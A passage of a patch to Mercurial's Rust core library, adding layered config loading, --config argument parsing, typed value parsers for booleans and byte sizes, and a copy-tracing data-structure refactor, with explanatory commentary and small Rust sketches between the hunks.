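    // Display gives the user-facing message; origin and line number
    // reporting are still TODO, per the comment above.
    assert_eq!(
        err.to_string(),
        "config error: ui.timeout is not a valid integer ('soon')"
    );
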
impl Config {
+ /// Load system and user configuration from various files.
+ ///
+ /// This is also affected by some environment variables.
+ pub fn load(
+ cli_config_args: impl IntoIterator<Item = impl AsRef<[u8]>>,
+ ) -> Result<Self, ConfigError> {
+ let mut config = Self { layers: Vec::new() };
+ let opt_rc_path = env::var_os("HGRCPATH");
+ // HGRCPATH replaces system config
+ if opt_rc_path.is_none() {
+ config.add_system_config()?
+ }
+
+ config.add_for_environment_variable("EDITOR", b"ui", b"editor");
+ config.add_for_environment_variable("VISUAL", b"ui", b"editor");
+ config.add_for_environment_variable("PAGER", b"pager", b"pager");
+
+ // These are set by `run-tests.py --rhg` to enable fallback for the
+ // entire test suite. Alternatives would be setting configuration
+ // through `$HGRCPATH` but some tests override that, or changing the
+ // `hg` shell alias to include `--config` but that disrupts tests that
+ // print command lines and check expected output.
+ config.add_for_environment_variable(
+ "RHG_ON_UNSUPPORTED",
+ b"rhg",
+ b"on-unsupported",
+ );
+ config.add_for_environment_variable(
+ "RHG_FALLBACK_EXECUTABLE",
+ b"rhg",
+ b"fallback-executable",
+ );
+
+ // HGRCPATH replaces user config
+ if opt_rc_path.is_none() {
+ config.add_user_config()?
+ }
+ if let Some(rc_path) = &opt_rc_path {
+ for path in env::split_paths(rc_path) {
+ if !path.as_os_str().is_empty() {
+ if path.is_dir() {
+ config.add_trusted_dir(&path)?
+ } else {
+ config.add_trusted_file(&path)?
+ }
+ }
+ }
+ }
+ if let Some(layer) = ConfigLayer::parse_cli_args(cli_config_args)? {
+ config.layers.push(layer)
+ }
+ Ok(config)
+ }
+
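
The resulting precedence is simply layer order: system config (skipped entirely when `HGRCPATH` is set), the environment-variable shims, user config (likewise replaced by `HGRCPATH`), each `HGRCPATH` entry in turn, and finally the `--config` arguments, which therefore win over everything. A hedged usage sketch from inside hg-core, with error handling elided via `unwrap`:

    // --config layers are pushed last, so they shadow every file-based
    // layer that sets the same item.
    let cli = vec![b"ui.interactive=false".to_vec()];
    let config = Config::load(cli).unwrap();
    assert_eq!(
        config.get_option(b"ui", b"interactive").unwrap(),
        Some(false)
    );
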
+ fn add_trusted_dir(&mut self, path: &Path) -> Result<(), ConfigError> {
+ if let Some(entries) = std::fs::read_dir(path)
+ .when_reading_file(path)
+ .io_not_found_as_none()?
+ {
+ let mut file_paths = entries
+ .map(|result| {
+ result.when_reading_file(path).map(|entry| entry.path())
+ })
+ .collect::<Result<Vec<_>, _>>()?;
+ file_paths.sort();
+ for file_path in &file_paths {
+ if file_path.extension() == Some(std::ffi::OsStr::new("rc")) {
+ self.add_trusted_file(&file_path)?
+ }
+ }
+ }
+ Ok(())
+ }
+
+ fn add_trusted_file(&mut self, path: &Path) -> Result<(), ConfigError> {
+ if let Some(data) = std::fs::read(path)
+ .when_reading_file(path)
+ .io_not_found_as_none()?
+ {
+ self.layers.extend(ConfigLayer::parse(path, &data)?)
+ }
+ Ok(())
+ }
+
+ fn add_for_environment_variable(
+ &mut self,
+ var: &str,
+ section: &[u8],
+ key: &[u8],
+ ) {
+ if let Some(value) = env::var_os(var) {
+ let origin = layer::ConfigOrigin::Environment(var.into());
+ let mut layer = ConfigLayer::new(origin);
+ layer.add(
+ section.to_owned(),
+ key.to_owned(),
+ get_bytes_from_os_str(value),
+ None,
+ );
+ self.layers.push(layer)
+ }
+ }
+
+ #[cfg(unix)] // TODO: other platforms
+ fn add_system_config(&mut self) -> Result<(), ConfigError> {
+ let mut add_for_prefix = |prefix: &Path| -> Result<(), ConfigError> {
+ let etc = prefix.join("etc").join("mercurial");
+ self.add_trusted_file(&etc.join("hgrc"))?;
+ self.add_trusted_dir(&etc.join("hgrc.d"))
+ };
+ let root = Path::new("/");
+ // TODO: use `std::env::args_os().next().unwrap()` a.k.a. argv[0]
+ // instead? TODO: can this be a relative path?
+ let hg = crate::utils::current_exe()?;
+ // TODO: this order (per-installation then per-system) matches
+ // `systemrcpath()` in `mercurial/scmposix.py`, but
+ // `mercurial/helptext/config.txt` suggests it should be reversed
+ if let Some(installation_prefix) = hg.parent().and_then(Path::parent) {
+ if installation_prefix != root {
+ add_for_prefix(&installation_prefix)?
+ }
+ }
+ add_for_prefix(root)?;
+ Ok(())
+ }
+
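
Concretely, an `hg` executable at the hypothetical path `/usr/local/bin/hg` yields the per-installation prefix `/usr/local`, so the files read are `/usr/local/etc/mercurial/hgrc` plus `/usr/local/etc/mercurial/hgrc.d/*.rc`, followed by the same pair under `/`. A self-contained sketch of that prefix arithmetic:

    use std::path::Path;

    fn main() {
        // The installation prefix is the grandparent of the executable:
        // /usr/local/bin/hg -> /usr/local
        let hg = Path::new("/usr/local/bin/hg");
        let prefix = hg.parent().and_then(Path::parent).unwrap();
        assert_eq!(prefix, Path::new("/usr/local"));

        // Per-prefix locations, mirroring add_for_prefix above.
        let etc = prefix.join("etc").join("mercurial");
        assert_eq!(etc.join("hgrc"), Path::new("/usr/local/etc/mercurial/hgrc"));
        assert_eq!(
            etc.join("hgrc.d"),
            Path::new("/usr/local/etc/mercurial/hgrc.d")
        );
    }
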
+ #[cfg(unix)] // TODO: other platforms
+ fn add_user_config(&mut self) -> Result<(), ConfigError> {
+ let opt_home = home::home_dir();
+ if let Some(home) = &opt_home {
+ self.add_trusted_file(&home.join(".hgrc"))?
+ }
+ let darwin = cfg!(any(target_os = "macos", target_os = "ios"));
+ if !darwin {
+ if let Some(config_home) = env::var_os("XDG_CONFIG_HOME")
+ .map(PathBuf::from)
+ .or_else(|| opt_home.map(|home| home.join(".config")))
+ {
+ self.add_trusted_file(&config_home.join("hg").join("hgrc"))?
+ }
+ }
+ Ok(())
+ }
+
/// Loads in order, which means that the precedence is the same
/// as the order of `sources`.
pub fn load_from_explicit_sources(
@@ -62,7 +242,7 @@
ConfigSource::AbsPath(c) => {
// TODO check if it should be trusted
// mercurial/ui.py:427
- let data = match read_whole_file(&c) {
+ let data = match std::fs::read(&c) {
Err(_) => continue, // same as the python code
Ok(data) => data,
};
@@ -74,13 +254,86 @@
Ok(Config { layers })
}
- /// Loads the local config. In a future version, this will also load the
- /// `$HOME/.hgrc` and more to mirror the Python implementation.
- pub fn load() -> Result<Self, ConfigError> {
- let root = find_root().unwrap();
- Ok(Self::load_from_explicit_sources(vec![
- ConfigSource::AbsPath(root.join(".hg/hgrc")),
- ])?)
+ /// Loads the per-repository config into a new `Config` which is combined
+ /// with `self`.
+ pub(crate) fn combine_with_repo(
+ &self,
+ repo_config_files: &[PathBuf],
+ ) -> Result<Self, ConfigError> {
+ let (cli_layers, other_layers) = self
+ .layers
+ .iter()
+ .cloned()
+ .partition(ConfigLayer::is_from_command_line);
+
+ let mut repo_config = Self {
+ layers: other_layers,
+ };
+ for path in repo_config_files {
+ // TODO: check if this file should be trusted:
+ // `mercurial/ui.py:427`
+ repo_config.add_trusted_file(path)?;
+ }
+ repo_config.layers.extend(cli_layers);
+ Ok(repo_config)
+ }
+
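
Note the re-layering trick: rather than appending the repo config, `combine_with_repo` peels off the `--config` layers with `Iterator::partition`, stacks `.hg/hgrc` on top of the file-based layers, then re-pushes the command-line layers so they keep the highest precedence. A standalone sketch of the same move, with strings standing in for `ConfigLayer`:

    fn main() {
        // Stand-ins for config layers, lowest precedence first.
        let layers = vec!["system", "user", "--config cli"];

        // Peel off the command-line layers, as combine_with_repo does.
        let (cli, mut combined): (Vec<_>, Vec<_>) = layers
            .into_iter()
            .partition(|layer| layer.starts_with("--config"));

        // Repo-level config stacks above the file-based layers...
        combined.push("repo .hg/hgrc");
        // ...but stays below anything given on the command line.
        combined.extend(cli);

        assert_eq!(combined, ["system", "user", "repo .hg/hgrc", "--config cli"]);
    }
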
+ fn get_parse<'config, T: 'config>(
+ &'config self,
+ section: &[u8],
+ item: &[u8],
+ expected_type: &'static str,
+ parse: impl Fn(&'config [u8]) -> Option<T>,
+ ) -> Result<Option<T>, ConfigValueParseError> {
+ match self.get_inner(&section, &item) {
+ Some((layer, v)) => match parse(&v.bytes) {
+ Some(b) => Ok(Some(b)),
+ None => Err(ConfigValueParseError {
+ origin: layer.origin.to_owned(),
+ line: v.line,
+ value: v.bytes.to_owned(),
+ section: section.to_owned(),
+ item: item.to_owned(),
+ expected_type,
+ }),
+ },
+ None => Ok(None),
+ }
+ }
+
+ /// Returns an `Err` if the first value found is not a valid UTF-8 string.
+ /// Otherwise, returns an `Ok(value)` if found, or `None`.
+ pub fn get_str(
+ &self,
+ section: &[u8],
+ item: &[u8],
+ ) -> Result<Option<&str>, ConfigValueParseError> {
+ self.get_parse(section, item, "ASCII or UTF-8 string", |value| {
+ str::from_utf8(value).ok()
+ })
+ }
+
+ /// Returns an `Err` if the first value found is not a valid unsigned
+ /// integer. Otherwise, returns an `Ok(value)` if found, or `None`.
+ pub fn get_u32(
+ &self,
+ section: &[u8],
+ item: &[u8],
+ ) -> Result<Option<u32>, ConfigValueParseError> {
+ self.get_parse(section, item, "valid integer", |value| {
+ str::from_utf8(value).ok()?.parse().ok()
+ })
+ }
+
+ /// Returns an `Err` if the first value found is not a valid file size
+ /// value such as `30` (default unit is bytes), `7 MB`, or `42.5 kb`.
+ /// Otherwise, returns an `Ok(value_in_bytes)` if found, or `None`.
+ pub fn get_byte_size(
+ &self,
+ section: &[u8],
+ item: &[u8],
+ ) -> Result<Option<u64>, ConfigValueParseError> {
+ self.get_parse(section, item, "byte quantity", values::parse_byte_size)
}
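
The `values::parse_byte_size` helper lives in the new `values` module, which this patch does not show. Going only by the docstring above, a rough standalone approximation — not the actual hg-core parser, and supporting only a handful of units — could be:

    /// Parse a byte quantity such as "30", "7 MB", or "42.5 kb".
    /// Unit names are matched case-insensitively; bytes are the default.
    fn parse_byte_size(value: &str) -> Option<u64> {
        let value = value.trim().to_ascii_lowercase();
        for &(suffix, multiplier) in &[
            ("kb", 1u64 << 10),
            ("mb", 1 << 20),
            ("gb", 1 << 30),
            ("b", 1),
        ] {
            if let Some(number) = value.strip_suffix(suffix) {
                let number: f64 = number.trim().parse().ok()?;
                return Some((number * multiplier as f64) as u64);
            }
        }
        value.parse().ok()
    }

    fn main() {
        assert_eq!(parse_byte_size("30"), Some(30));
        assert_eq!(parse_byte_size("1.5 KB"), Some(1536));
        assert_eq!(parse_byte_size("7 MB"), Some(7 << 20));
        assert_eq!(parse_byte_size("1 ub"), None); // unknown unit, as in the test
    }
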
/// Returns an `Err` if the first value found is not a valid boolean.
@@ -90,18 +343,8 @@
&self,
section: &[u8],
item: &[u8],
- ) -> Result<Option<bool>, ConfigError> {
- match self.get_inner(&section, &item) {
- Some((layer, v)) => match parse_bool(&v.bytes) {
- Some(b) => Ok(Some(b)),
- None => Err(ConfigError::Parse {
- origin: layer.origin.to_owned(),
- line: v.line,
- bytes: v.bytes.to_owned(),
- }),
- },
- None => Ok(None),
- }
+ ) -> Result<Option<bool>, ConfigValueParseError> {
+ self.get_parse(section, item, "boolean", values::parse_bool)
}
/// Returns the corresponding boolean in the config. Returns `Ok(false)`
@@ -110,10 +353,35 @@
&self,
section: &[u8],
item: &[u8],
- ) -> Result<bool, ConfigError> {
+ ) -> Result<bool, ConfigValueParseError> {
Ok(self.get_option(section, item)?.unwrap_or(false))
}
+ /// Returns the corresponding list-value in the config if found, or `None`.
+ ///
+ /// This is appropriate for new configuration keys. The value syntax is
+ /// **not** the same as most existing list-valued config, which has Python
+ /// parsing implemented in `parselist()` in `mercurial/config.py`.
+ /// Faithfully porting that parsing algorithm to Rust (including behavior
+ /// that are arguably bugs) turned out to be non-trivial and hasn’t been
+ /// completed as of this writing.
+ ///
+ /// Instead, the "simple" syntax is: split on comma, then trim leading and
+ /// trailing whitespace of each component. Quotes or backslashes are not
+ /// interpreted in any way. Commas are mandatory between values. Values
+ /// that contain a comma are not supported.
+ pub fn get_simple_list(
+ &self,
+ section: &[u8],
+ item: &[u8],
+ ) -> Option<impl Iterator<Item = &[u8]>> {
+ self.get(section, item).map(|value| {
+ value
+ .split(|&byte| byte == b',')
+ .map(|component| component.trim())
+ })
+ }
+
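
For example, `b" foo , bar,baz "` yields `foo`, `bar`, `baz`, while quotes stay literal. A standalone sketch of the same splitting, with the byte-slice trimming (done via hg-core's own `SliceExt` in the code above) written out by hand:

    /// Split a config value on commas and trim ASCII whitespace from
    /// each component, mirroring the "simple" list syntax.
    fn simple_list(value: &[u8]) -> impl Iterator<Item = &[u8]> {
        value.split(|&byte| byte == b',').map(|component| {
            match component.iter().position(|b| !b.is_ascii_whitespace()) {
                Some(start) => {
                    let end = component
                        .iter()
                        .rposition(|b| !b.is_ascii_whitespace())
                        .unwrap();
                    &component[start..=end]
                }
                None => &component[..0],
            }
        })
    }

    fn main() {
        let items: Vec<_> = simple_list(b" foo , bar,baz ").collect();
        assert_eq!(items, [&b"foo"[..], b"bar", b"baz"]);
        // Quotes are not interpreted: they stay part of the value.
        let quoted: Vec<_> = simple_list(b"'a, b'").collect();
        assert_eq!(quoted, [&b"'a"[..], b"b'"]);
    }
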
/// Returns the raw value bytes of the first one found, or `None`.
pub fn get(&self, section: &[u8], item: &[u8]) -> Option<&[u8]> {
self.get_inner(section, item)
@@ -137,6 +405,14 @@
None
}
+ /// Return all keys defined for the given section
+ pub fn get_section_keys(&self, section: &[u8]) -> HashSet<&[u8]> {
+ self.layers
+ .iter()
+ .flat_map(|layer| layer.iter_keys(section))
+ .collect()
+ }
+
/// Get raw values bytes from all layers (even untrusted ones) in order
/// of precedence.
#[cfg(test)]
@@ -169,15 +445,14 @@
let base_config_path = tmpdir_path.join("base.rc");
let mut config_file = File::create(&base_config_path).unwrap();
let data =
- b"[section]\nitem=value0\n%include included.rc\nitem=value2";
+ b"[section]\nitem=value0\n%include included.rc\nitem=value2\n\
+ [section2]\ncount = 4\nsize = 1.5 KB\nnot-count = 1.5\nnot-size = 1 ub";
config_file.write_all(data).unwrap();
let sources = vec![ConfigSource::AbsPath(base_config_path)];
let config = Config::load_from_explicit_sources(sources)
.expect("expected valid config");
- dbg!(&config);
-
let (_, value) = config.get_inner(b"section", b"item").unwrap();
assert_eq!(
value,
@@ -193,5 +468,13 @@
config.get_all(b"section", b"item"),
[b"value2", b"value1", b"value0"]
);
+
+ assert_eq!(config.get_u32(b"section2", b"count").unwrap(), Some(4));
+ assert_eq!(
+ config.get_byte_size(b"section2", b"size").unwrap(),
+ Some(1024 + 512)
+ );
+ assert!(config.get_u32(b"section2", b"not-count").is_err());
+ assert!(config.get_byte_size(b"section2", b"not-size").is_err());
}
}
--- a/rust/hg-core/src/config/layer.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/config/layer.rs Tue Apr 20 11:01:06 2021 -0400
@@ -7,14 +7,12 @@
// This software may be used and distributed according to the terms of the
// GNU General Public License version 2 or any later version.
-use crate::utils::files::{
- get_bytes_from_path, get_path_from_bytes, read_whole_file,
-};
-use format_bytes::format_bytes;
+use crate::errors::HgError;
+use crate::utils::files::{get_bytes_from_path, get_path_from_bytes};
+use format_bytes::{format_bytes, write_bytes, DisplayBytes};
use lazy_static::lazy_static;
use regex::bytes::Regex;
use std::collections::HashMap;
-use std::io;
use std::path::{Path, PathBuf};
lazy_static! {
@@ -53,6 +51,51 @@
}
}
+ /// Parse `--config` CLI arguments and return a layer if there are any
+ pub(crate) fn parse_cli_args(
+ cli_config_args: impl IntoIterator<Item = impl AsRef<[u8]>>,
+ ) -> Result<Option<Self>, ConfigError> {
+ fn parse_one(arg: &[u8]) -> Option<(Vec<u8>, Vec<u8>, Vec<u8>)> {
+ use crate::utils::SliceExt;
+
+ let (section_and_item, value) = arg.split_2(b'=')?;
+ let (section, item) = section_and_item.trim().split_2(b'.')?;
+ Some((
+ section.to_owned(),
+ item.to_owned(),
+ value.trim().to_owned(),
+ ))
+ }
+
+ let mut layer = Self::new(ConfigOrigin::CommandLine);
+ for arg in cli_config_args {
+ let arg = arg.as_ref();
+ if let Some((section, item, value)) = parse_one(arg) {
+ layer.add(section, item, value, None);
+ } else {
+ Err(HgError::abort(format!(
+ "abort: malformed --config option: '{}' \
+ (use --config section.name=value)",
+ String::from_utf8_lossy(arg),
+ )))?
+ }
+ }
+ if layer.sections.is_empty() {
+ Ok(None)
+ } else {
+ Ok(Some(layer))
+ }
+ }
+
+ /// Returns whether this layer comes from `--config` CLI arguments
+ pub(crate) fn is_from_command_line(&self) -> bool {
+ if let ConfigOrigin::CommandLine = self.origin {
+ true
+ } else {
+ false
+ }
+ }
+
/// Add an entry to the config, overwriting the old one if already present.
pub fn add(
&mut self,
@@ -72,6 +115,14 @@
Some(self.sections.get(section)?.get(item)?)
}
+ /// Returns the keys defined in the given section
+ pub fn iter_keys(&self, section: &[u8]) -> impl Iterator<Item = &[u8]> {
+ self.sections
+ .get(section)
+ .into_iter()
+ .flat_map(|section| section.keys().map(|vec| &**vec))
+ }
+
pub fn is_empty(&self) -> bool {
self.sections.is_empty()
}
@@ -96,21 +147,39 @@
let mut section = b"".to_vec();
while let Some((index, bytes)) = lines_iter.next() {
+ let line = Some(index + 1);
if let Some(m) = INCLUDE_RE.captures(&bytes) {
let filename_bytes = &m[1];
- let filename_to_include = get_path_from_bytes(&filename_bytes);
- match read_include(&src, &filename_to_include) {
- (include_src, Ok(data)) => {
+ let filename_bytes = crate::utils::expand_vars(filename_bytes);
+ // `Path::parent` only fails for the root directory,
+ // which `src` can’t be since we’ve managed to open it as a
+ // file.
+ let dir = src
+ .parent()
+ .expect("Path::parent failed on a file we’ve read");
+ // `Path::join` with an absolute argument correctly ignores the
+ // base path
+ let filename = dir.join(&get_path_from_bytes(&filename_bytes));
+ match std::fs::read(&filename) {
+ Ok(data) => {
layers.push(current_layer);
- layers.extend(Self::parse(&include_src, &data)?);
+ layers.extend(Self::parse(&filename, &data)?);
current_layer =
Self::new(ConfigOrigin::File(src.to_owned()));
}
- (_, Err(e)) => {
- return Err(ConfigError::IncludeError {
- path: filename_to_include.to_owned(),
- io_error: e,
- })
+ Err(error) => {
+ if error.kind() != std::io::ErrorKind::NotFound {
+ return Err(ConfigParseError {
+ origin: ConfigOrigin::File(src.to_owned()),
+ line,
+ message: format_bytes!(
+ b"cannot include {} ({})",
+ filename_bytes,
+ format_bytes::Utf8(error)
+ ),
+ }
+ .into());
+ }
}
}
} else if let Some(_) = EMPTY_RE.captures(&bytes) {
@@ -134,22 +203,23 @@
};
lines_iter.next();
}
- current_layer.add(
- section.clone(),
- item,
- value,
- Some(index + 1),
- );
+ current_layer.add(section.clone(), item, value, line);
} else if let Some(m) = UNSET_RE.captures(&bytes) {
if let Some(map) = current_layer.sections.get_mut(&section) {
map.remove(&m[1]);
}
} else {
- return Err(ConfigError::Parse {
+ let message = if bytes.starts_with(b" ") {
+ format_bytes!(b"unexpected leading whitespace: {}", bytes)
+ } else {
+ bytes.to_owned()
+ };
+ return Err(ConfigParseError {
origin: ConfigOrigin::File(src.to_owned()),
- line: Some(index + 1),
- bytes: bytes.to_owned(),
- });
+ line,
+ message,
+ }
+ .into());
}
}
if !current_layer.is_empty() {
@@ -159,8 +229,11 @@
}
}
-impl std::fmt::Debug for ConfigLayer {
- fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+impl DisplayBytes for ConfigLayer {
+ fn display_bytes(
+ &self,
+ out: &mut dyn std::io::Write,
+ ) -> std::io::Result<()> {
let mut sections: Vec<_> = self.sections.iter().collect();
sections.sort_by(|e0, e1| e0.0.cmp(e1.0));
@@ -169,16 +242,13 @@
items.sort_by(|e0, e1| e0.0.cmp(e1.0));
for (item, config_entry) in items {
- writeln!(
- f,
- "{}",
- String::from_utf8_lossy(&format_bytes!(
- b"{}.{}={} # {}",
- section,
- item,
- &config_entry.bytes,
- &self.origin.to_bytes(),
- ))
+ write_bytes!(
+ out,
+ b"{}.{}={} # {}\n",
+ section,
+ item,
+ &config_entry.bytes,
+ &self.origin,
)?
}
}
@@ -205,9 +275,11 @@
#[derive(Clone, Debug)]
pub enum ConfigOrigin {
- /// The value comes from a configuration file
+ /// From a configuration file
File(PathBuf),
- /// The value comes from the environment like `$PAGER` or `$EDITOR`
+ /// From a `--config` CLI argument
+ CommandLine,
+ /// From environment variables like `$PAGER` or `$EDITOR`
Environment(Vec<u8>),
/* TODO cli
* TODO defaults (configitems.py)
@@ -216,53 +288,32 @@
* Others? */
}
-impl ConfigOrigin {
- /// TODO use some kind of dedicated trait?
- pub fn to_bytes(&self) -> Vec<u8> {
+impl DisplayBytes for ConfigOrigin {
+ fn display_bytes(
+ &self,
+ out: &mut dyn std::io::Write,
+ ) -> std::io::Result<()> {
match self {
- ConfigOrigin::File(p) => get_bytes_from_path(p),
- ConfigOrigin::Environment(e) => e.to_owned(),
+ ConfigOrigin::File(p) => out.write_all(&get_bytes_from_path(p)),
+ ConfigOrigin::CommandLine => out.write_all(b"--config"),
+ ConfigOrigin::Environment(e) => write_bytes!(out, b"${}", e),
}
}
}
#[derive(Debug)]
-pub enum ConfigError {
- Parse {
- origin: ConfigOrigin,
- line: Option<usize>,
- bytes: Vec<u8>,
- },
- /// Failed to include a sub config file
- IncludeError {
- path: PathBuf,
- io_error: std::io::Error,
- },
- /// Any IO error that isn't expected
- IO(std::io::Error),
+pub struct ConfigParseError {
+ pub origin: ConfigOrigin,
+ pub line: Option<usize>,
+ pub message: Vec<u8>,
}
-impl From<std::io::Error> for ConfigError {
- fn from(e: std::io::Error) -> Self {
- Self::IO(e)
- }
+#[derive(Debug, derive_more::From)]
+pub enum ConfigError {
+ Parse(ConfigParseError),
+ Other(HgError),
}
fn make_regex(pattern: &'static str) -> Regex {
Regex::new(pattern).expect("expected a valid regex")
}
-
-/// Includes are relative to the file they're defined in, unless they're
-/// absolute.
-fn read_include(
- old_src: &Path,
- new_src: &Path,
-) -> (PathBuf, io::Result<Vec<u8>>) {
- if new_src.is_absolute() {
- (new_src.to_path_buf(), read_whole_file(&new_src))
- } else {
- let dir = old_src.parent().unwrap();
- let new_src = dir.join(&new_src);
- (new_src.to_owned(), read_whole_file(&new_src))
- }
-}
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/rust/hg-core/src/config/values.rs Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,61 @@
+//! Parsing functions for various types of configuration values.
+//!
+//! Returning `None` indicates a syntax error. Using a `Result` would be more
+//! correct but would take more boilerplate for converting between error types,
+//! compared to using `.ok()` on inner results of various error types to
+//! convert them all to options. The `Config::get_parse` method later converts
+//! those options to results with `ConfigValueParseError`, which contains
+//! details about where the value came from (but omits details of what’s
+//! invalid inside the value).
+
+pub(super) fn parse_bool(v: &[u8]) -> Option<bool> {
+ match v.to_ascii_lowercase().as_slice() {
+ b"1" | b"yes" | b"true" | b"on" | b"always" => Some(true),
+ b"0" | b"no" | b"false" | b"off" | b"never" => Some(false),
+ _ => None,
+ }
+}
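// For illustration: parse_bool(b"Yes") == Some(true),
// parse_bool(b"off") == Some(false), and parse_bool(b"maybe") == None,
// which `Config::get_parse` then reports as a `ConfigValueParseError`.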
+
+pub(super) fn parse_byte_size(value: &[u8]) -> Option<u64> {
+ let value = std::str::from_utf8(value).ok()?.to_ascii_lowercase();
+ const UNITS: &[(&str, u64)] = &[
+ ("g", 1 << 30),
+ ("gb", 1 << 30),
+ ("m", 1 << 20),
+ ("mb", 1 << 20),
+ ("k", 1 << 10),
+ ("kb", 1 << 10),
+ ("b", 1 << 0), // Needs to be last
+ ];
+ for &(unit, multiplier) in UNITS {
+ // TODO: use `value.strip_suffix(unit)` when we require Rust 1.45+
+ if value.ends_with(unit) {
+ let value_before_unit = &value[..value.len() - unit.len()];
+ let float: f64 = value_before_unit.trim().parse().ok()?;
+ if float >= 0.0 {
+ return Some((float * multiplier as f64).round() as u64);
+ } else {
+ return None;
+ }
+ }
+ }
+ value.parse().ok()
+}
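// An illustrative sketch (not part of the patch) of the rewrite the TODO
// above refers to: `str::strip_suffix`, stable since Rust 1.45, replaces the
// manual `ends_with` check plus slicing with otherwise identical semantics.
// The function name is a hypothetical stand-in.
fn parse_byte_size_with_strip_suffix(value: &[u8]) -> Option<u64> {
    let value = std::str::from_utf8(value).ok()?.to_ascii_lowercase();
    const UNITS: &[(&str, u64)] = &[
        ("g", 1 << 30),
        ("gb", 1 << 30),
        ("m", 1 << 20),
        ("mb", 1 << 20),
        ("k", 1 << 10),
        ("kb", 1 << 10),
        ("b", 1 << 0), // Needs to be last
    ];
    for &(unit, multiplier) in UNITS {
        if let Some(value_before_unit) = value.strip_suffix(unit) {
            let float: f64 = value_before_unit.trim().parse().ok()?;
            return if float >= 0.0 {
                Some((float * multiplier as f64).round() as u64)
            } else {
                None
            };
        }
    }
    value.parse().ok()
}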
+
+#[test]
+fn test_parse_byte_size() {
+ assert_eq!(parse_byte_size(b""), None);
+ assert_eq!(parse_byte_size(b"b"), None);
+
+ assert_eq!(parse_byte_size(b"12"), Some(12));
+ assert_eq!(parse_byte_size(b"12b"), Some(12));
+ assert_eq!(parse_byte_size(b"12 b"), Some(12));
+ assert_eq!(parse_byte_size(b"12.1 b"), Some(12));
+ assert_eq!(parse_byte_size(b"1.1 K"), Some(1126));
+ assert_eq!(parse_byte_size(b"1.1 kB"), Some(1126));
+
+ assert_eq!(parse_byte_size(b"-12 b"), None);
+ assert_eq!(parse_byte_size(b"-0.1 b"), None);
+ assert_eq!(parse_byte_size(b"0.1 b"), Some(0));
+ assert_eq!(parse_byte_size(b"12.1 b"), Some(12));
+}
--- a/rust/hg-core/src/copy_tracing.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/copy_tracing.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,46 +1,121 @@
+#[cfg(test)]
+#[macro_use]
+mod tests_support;
+
+#[cfg(test)]
+mod tests;
+
use crate::utils::hg_path::HgPath;
use crate::utils::hg_path::HgPathBuf;
use crate::Revision;
use crate::NULL_REVISION;
-use im_rc::ordmap::DiffItem;
+use bytes_cast::{unaligned, BytesCast};
use im_rc::ordmap::Entry;
use im_rc::ordmap::OrdMap;
+use im_rc::OrdSet;
use std::cmp::Ordering;
use std::collections::HashMap;
-use std::convert::TryInto;
pub type PathCopies = HashMap<HgPathBuf, HgPathBuf>;
type PathToken = usize;
-#[derive(Clone, Debug, PartialEq, Copy)]
-struct TimeStampedPathCopy {
+#[derive(Clone, Debug)]
+struct CopySource {
/// revision at which the copy information was added
rev: Revision,
/// the copy source, (Set to None in case of deletion of the associated
/// key)
path: Option<PathToken>,
+ /// a set of previous `CopySource.rev` values directly or indirectly
+ /// overwritten by this one.
+ overwritten: OrdSet<Revision>,
+}
+
+impl CopySource {
+ /// Create a new CopySource
+ ///
+ /// Use this when no previous copy source existed.
+ fn new(rev: Revision, path: Option<PathToken>) -> Self {
+ Self {
+ rev,
+ path,
+ overwritten: OrdSet::new(),
+ }
+ }
+
+ /// Create a new CopySource from merging two others
+ ///
+ /// Use this when merging two InternalPathCopies requires active merging of
+ /// some entries.
+ fn new_from_merge(rev: Revision, winner: &Self, loser: &Self) -> Self {
+ let mut overwritten = OrdSet::new();
+ overwritten.extend(winner.overwritten.iter().copied());
+ overwritten.extend(loser.overwritten.iter().copied());
+ overwritten.insert(winner.rev);
+ overwritten.insert(loser.rev);
+ Self {
+ rev,
+ path: winner.path,
+ overwritten,
+ }
+ }
+
+ /// Update the value of a pre-existing CopySource
+ ///
+ /// Use this when recording copy information from parent → child edges
+ fn overwrite(&mut self, rev: Revision, path: Option<PathToken>) {
+ self.overwritten.insert(self.rev);
+ self.rev = rev;
+ self.path = path;
+ }
+
+ /// Mark pre-existing copy information as "dropped" by a file deletion
+ ///
+ /// Use this when recording copy information from parent → child edges
+ fn mark_delete(&mut self, rev: Revision) {
+ self.overwritten.insert(self.rev);
+ self.rev = rev;
+ self.path = None;
+ }
+
+ /// Mark pre-existing copy information as "dropped" by a file deletion
+ ///
+ /// Use this when recording copy information from parent → child edges
+ fn mark_delete_with_pair(&mut self, rev: Revision, other: &Self) {
+ self.overwritten.insert(self.rev);
+ if other.rev != rev {
+ self.overwritten.insert(other.rev);
+ }
+ self.overwritten.extend(other.overwritten.iter().copied());
+ self.rev = rev;
+ self.path = None;
+ }
+
+ fn is_overwritten_by(&self, other: &Self) -> bool {
+ other.overwritten.contains(&self.rev)
+ }
+}
+
+// For the same "dest", content generated for a given revision will always be
+// the same.
+impl PartialEq for CopySource {
+ fn eq(&self, other: &Self) -> bool {
+ #[cfg(debug_assertions)]
+ {
+ if self.rev == other.rev {
+ debug_assert!(self.path == other.path);
+ debug_assert!(self.overwritten == other.overwritten);
+ }
+ }
+ self.rev == other.rev
+ }
}
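// An illustrative walkthrough (not part of the patch) of how `overwritten`
// accumulates; the revision numbers and the `0` path token are arbitrary:
//
//     let mut source = CopySource::new(1, Some(0));
//     source.overwrite(3, Some(0)); // rev: 3, overwritten: {1}
//     source.mark_delete(5);        // rev: 5, path: None, overwritten: {1, 3}
//     assert!(CopySource::new(1, Some(0)).is_overwritten_by(&source));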
/// maps CopyDestination to Copy Source (+ a "timestamp" for the operation)
-type TimeStampedPathCopies = OrdMap<PathToken, TimeStampedPathCopy>;
-
-/// hold parent 1, parent 2 and relevant files actions.
-pub type RevInfo<'a> = (Revision, Revision, ChangedFiles<'a>);
-
-/// represent the files affected by a changesets
-///
-/// This hold a subset of mercurial.metadata.ChangingFiles as we do not need
-/// all the data categories tracked by it.
-/// This hold a subset of mercurial.metadata.ChangingFiles as we do not need
-/// all the data categories tracked by it.
-pub struct ChangedFiles<'a> {
- nb_items: u32,
- index: &'a [u8],
- data: &'a [u8],
-}
+type InternalPathCopies = OrdMap<PathToken, CopySource>;
/// Represent active changes that affect the copy tracing.
enum Action<'a> {
